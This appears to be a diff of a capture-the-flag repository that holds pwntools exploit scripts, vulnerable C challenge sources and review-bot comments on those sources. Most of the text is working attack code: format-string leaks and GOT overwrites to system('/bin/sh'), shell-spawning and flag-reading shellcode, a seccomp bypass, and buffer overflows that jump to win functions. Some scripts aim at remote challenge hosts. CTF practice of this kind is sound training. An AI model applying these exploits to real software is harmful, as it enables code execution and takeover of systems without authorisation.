r, partial_ret = brute()
log.info("ret: %#x", partial_ret)
buf = f"%97c%48$hhn".encode()
buf += b"AAAA%17$p.%19$p"
r.sendlineafter(b": ", buf)
r.recvuntil(b"AAAA")
leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
libc.address = int(leaks[0], 16) - 0x29d68
log.info("libc: %#x", libc.address)
target.address = int(leaks[1], 16) - 0x1169
log.info("elf: %#x", target.address)
# write
partial_ret = int(hex(libc.sym.system)[-4:], 16)
buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
r.sendline(buf)
r.sendline(b"/bin/sh")
r.interactive()
"""
# write
partial_ret = 0xe068
write = (0x61 - (partial_ret & 0xff)) & 0xff
buf = b"%c"*16 + f"%{partial_ret-16}c%hn".encode()
buf += f'%{write}c%48$hhn'.encode()
s(buf)
# leak
buf = f"%97c%48$hhn".encode()
buf += b"AAAA%17$p.%19$p"
s(buf)
r.recvuntil(b"AAAA")
leaks = re.findall(r'0x[a-z0-9]+', r.recvS())
libc.address = int(leaks[0], 16) - 0x29d68
target.address = int(leaks[1], 16) - 0x1169
log.info("elf: %#x", target.address)
# write
partial_ret = 0x38f0
buf = f"%{partial_ret}c%12$hn".encode().ljust(16, b"A") + b"%110c%48$hhn".ljust(16, b"A") + p64(target.got.printf)
r.sendline(buf)
"""
BIN
Binary file not shown.
+14
@@ -0,0 +1,14 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./hide", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# buf
s(b"%160c%hhn%6$s")
r.interactive()
BIN
Binary file not shown.
+21
@@ -0,0 +1,21 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./vuln", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b":", a)
# leak
s(b"%23$p")
main = int(r.recvline(), 16)
log.info("main: %#x", main)
win = main - 0x96
log.info("win: %#x", win)
# jmp
s(str(hex(win)).encode())
r.interactive()
+56
@@ -0,0 +1,56 @@
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void segfault_handler() {
printf("Segfault Occurred, incorrect address.\n");
exit(0);
}
void call_functions() {
char buffer[64];
printf("Enter your name:");
fgets(buffer, 64, stdin);
printf(buffer);
unsigned long val;
printf(" enter the address to jump to, ex => 0x12345: ");
scanf("%lx", &val);
void (*foo)(void) = (void (*)())val;
foo();
}
int win() {
FILE *fptr;
char c;
printf("You won!\n");
// Open file
fptr = fopen("flag.txt", "r");
if (fptr == NULL)
{
printf("Cannot open file.\n");
exit(0);
}
// Read contents from file
c = fgetc(fptr);
while (c != EOF)
{
printf ("%c", c);
c = fgetc(fptr);
}
printf("\n");
fclose(fptr);
}
int main() {
signal(SIGSEGV, segfault_handler);
setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered
call_functions();
return 0;
}
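Review bot: `printf(buffer)` in call_functions passes the line read by fgets as the format string, so conversion specifiers in the input are interpreted against the caller's stack; the fix is `printf("%s", buffer);`. In win, `char c` compared with `EOF` is unreliable: where char is unsigned the loop never terminates, and a 0xFF byte in the file ends it early, so declare `int c;` as fgetc returns. win is declared `int` but has no return statement, and segfault_handler calls printf and exit from a signal handler, neither of which is async-signal-safe; `write` and `_exit` are the safe equivalents there.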
BIN
Binary file not shown.
+40
@@ -0,0 +1,40 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./mad_seccomp", checksec=False)
r = process()
# funcs
s = lambda a: r.send(a)
# shellcode
sc = """
lea rsi, [rax+108]
lea rdx, [rax+200]
mov QWORD PTR [rdx], 2
mov QWORD PTR [rdx+16], 16
mov rax, 437
mov rdi, -100
mov r10, 24
syscall
mov rdi, rax
mov al, 17
lea rsi, [rdx+100]
mov rdx, 100
sub r10b, r10b
syscall
lea r11, [rsi]
mov QWORD PTR [rsi+100], r11
mov QWORD PTR [rsi+108], rax
mov rdi, 1
lea rsi, [rsi+100]
mov rdx, 1
mov rax, 20
syscall
"""
sc = asm(sc)
sc += b"flag.txt\0"
s(sc)
r.interactive()
Binary file not shown.
+44
@@ -0,0 +1,44 @@
#include <sys/syscall.h>
#include <stdio.h>
#include <linux/openat2.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
int main(void){
// get syscall num
printf("openat2: %d\n", SYS_openat2);
printf("pread64: %d\n", SYS_pread64);
printf("writev: %d\n", SYS_writev);
// struct
struct open_how how;
memset(&how, 0, sizeof(how));
how.flags = O_RDWR;
how.resolve = RESOLVE_IN_ROOT;
size_t size = sizeof(how);
// openat2
const char *file = "flag.txt";
long rax = syscall(SYS_openat2, AT_FDCWD, file, &how, size);
printf("fd: %d\n", rax);
// pread64
char buf[64];
long rax2 = syscall(SYS_pread64, rax, buf, 100, 0);
printf("string size: %d\n", rax2);
// struct
char *str = "Some string here";
struct iovec {
void *iov_base;
size_t iov_len;
};
struct iovec iov[1];
iov[0].iov_base = str;
iov[0].iov_len = strlen(str);
// writev
syscall(SYS_writev, 1, iov, 1);
return 0;
}
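Review bot: `syscall(SYS_pread64, rax, buf, 100, 0)` requests 100 bytes into the 64-byte `buf`, which overruns the stack array on any flag longer than 63 bytes; pass `sizeof buf` instead and skip the read when the openat2 result `rax` is negative. The `printf("fd: %d\n", rax)` and `printf("string size: %d\n", rax2)` lines format a `long` with `%d`, undefined behaviour that -Wformat flags; use `%ld`. `struct iovec` is already declared by <sys/uio.h>, so the local redefinition can be replaced by that include.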
+17
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./namelen", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*7
buf += b"i"
buf += b"A"*(20-len(buf))
s(buf)
r.interactive()
BIN
Binary file not shown.
+23
@@ -0,0 +1,23 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./chall", checksec=False)
r = process()
# funcs
s = lambda a: r.sendline(a)
# leak
r.recvuntil(b": ")
stack_addr = int(r.recvline(), 16)
log.info("stack_addr: %#x", stack_addr)
# buf
sc = asm(shellcraft.sh())
sc += b"\x90"*(88-len(sc))
buf = sc
buf += p64(stack_addr)
s(buf)
r.interactive()
BIN
Binary file not shown.
+38
@@ -0,0 +1,38 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./shellhard", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b": ", a)
# stage 1
sc = """
mov rsi, rdx
cqo
mov dl, 0xff
syscall
"""
sc = asm(sc)
s(sc)
# stage 2
sc = """
lea rsi, [rcx+48]
mov edi, -100
xor rdx, rdx
xor r10, r10
mov rax, 257
syscall
mov rsi, rax
mov rdi, 1
add r10b, 0xff
mov rax, 40
syscall
"""
sc = b"\x90"*10 + asm(sc) + b"flag.txt\0"
s(sc)
r.interactive()
BIN
Binary file not shown.
+27
@@ -0,0 +1,27 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./valley", checksec=False)
r = process()
# funcs
s = lambda a: r.sendlineafter(b": ", a)
ss = lambda a: r.sendline(a)
# leak
s(b"%20$p.%21$p")
r.recvuntil(b": ")
leaks = r.recvlineS().split(".")
stack_addr = int(leaks[0], 16) - 0x8
log.info("stack_addr: %#x", stack_addr)
print_flag = int(leaks[1], 16) - 0x1aa
log.info("print_flag: %#x", print_flag)
write_bytes = int(str(hex(print_flag))[-4:], 16)
fs = f"%{write_bytes}x%8$hnAAAA".encode()
# write
ss(fs+p64(stack_addr))
ss(b"exit")
r.interactive()
+49
@@ -0,0 +1,49 @@
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
void print_flag() {
char buf[32];
FILE *file = fopen("/home/valley/flag.txt", "r");
if (file == NULL) {
perror("Failed to open flag file");
exit(EXIT_FAILURE);
}
fgets(buf, sizeof(buf), file);
printf("Congrats! Here is your flag: %s", buf);
fclose(file);
exit(EXIT_SUCCESS);
}
void echo_valley() {
printf("Welcome to the Echo Valley, Try Shouting: \n");
char buf[100];
while(1)
{
fflush(stdout);
if (fgets(buf, sizeof(buf), stdin) == NULL) {
printf("\nEOF detected. Exiting...\n");
exit(0);
}
if (strcmp(buf, "exit\n") == 0) {
printf("The Valley Disappears\n");
break;
}
printf("You heard in the distance: ");
printf(buf);
fflush(stdout);
}
fflush(stdout);
}
int main()
{
echo_valley();
return 0;
}
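Review bot: `printf(buf)` in echo_valley passes the line read from stdin as the format string, so conversion specifiers in the input are interpreted against the stack; write `printf("%s", buf);`. In print_flag the return value of `fgets(buf, sizeof(buf), file)` is not checked, so an empty flag file prints the uninitialised `buf`; initialise it with `char buf[32] = {0};` or test the fgets result before the printf. The `fflush(stdout)` before `exit(0)` paths is fine, but the `exit(EXIT_SUCCESS)` at the end of print_flag means the fclose above it is the only cleanup that runs, which is worth a one-line comment.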
BIN
Binary file not shown.
+27
@@ -0,0 +1,27 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./voidexec", checksec=False)
libc = target.libc
r = process()
# funcs
s = lambda a: r.send(a)
# shellcode
sc = f"""
xor rsi, rsi
xor rdx, rdx
mov r9, [rsp+32]
sub r9, {libc.sym.__libc_start_call_main+128}
mov rdi, r9
add rdi, {next(libc.search(b"/bin/sh\0"))}
mov r15, r9
add r15, {libc.sym.execve}
call r15
"""
sc = asm(sc)
s(sc)
r.interactive()
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
BIN
Binary file not shown.
+17
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./B00fer", checksec=False)
# r = process()
r = remote("b00fer.niccgetsspooky.xyz", 9001)
# funcs
s = lambda a: r.sendline(a)
# buf
buf = b"A"*40
buf += p64(0x401227)
s(buf)
r.interactive()
+17
@@ -0,0 +1,17 @@
#!/usr/bin/python3
from pwn import *
context.binary = target = ELF("./pwn101", checksec=False)
# r = process()
r = remote("10.10.110.117", 9001)
# funcs
s = lambda a: r.sendlineafter(b":", a)
# buf
buf = b"A"*60
buf += p32(0x1337)
s(buf)
r.interactive()
